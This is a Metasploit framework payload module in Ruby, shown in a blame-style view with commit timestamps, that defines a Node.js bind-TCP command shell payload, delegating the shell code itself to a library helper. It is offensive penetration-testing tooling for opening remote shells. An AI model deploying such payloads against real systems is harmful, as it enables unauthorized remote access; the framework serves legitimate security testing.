2013-10-07 11:09:21 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-10-07 11:09:21 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
# It would be better to have a commonjs payload, but because the implementations
|
|
|
|
# differ so greatly when it comes to require() paths for net modules, we will
|
|
|
|
# settle for just getting shells on nodejs.
|
|
|
|
|
|
|
|
require 'msf/core'
|
2013-10-12 08:19:06 +00:00
|
|
|
require 'msf/core/payload/nodejs'
|
2013-10-09 16:39:05 +00:00
|
|
|
require 'msf/core/handler/bind_tcp'
|
2013-10-07 11:09:21 +00:00
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
module MetasploitModule
|
2013-10-07 11:09:21 +00:00
|
|
|
|
2015-03-09 20:31:04 +00:00
|
|
|
CachedSize = 456
|
|
|
|
|
2013-10-07 11:09:21 +00:00
|
|
|
include Msf::Payload::Single
|
2013-10-12 08:19:06 +00:00
|
|
|
include Msf::Payload::NodeJS
|
2013-10-07 11:09:21 +00:00
|
|
|
include Msf::Sessions::CommandShellOptions
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'Command Shell, Bind TCP (via nodejs)',
|
|
|
|
'Description' => 'Creates an interactive shell via nodejs',
|
|
|
|
'Author' => ['joev'],
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'nodejs',
|
|
|
|
'Arch' => ARCH_NODEJS,
|
|
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'nodejs',
|
|
|
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
super + command_string
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the JS string to use for execution
|
|
|
|
#
|
|
|
|
def command_string
|
2013-10-12 08:19:06 +00:00
|
|
|
nodejs_bind_tcp
|
2013-10-07 11:09:21 +00:00
|
|
|
end
|
|
|
|
end
|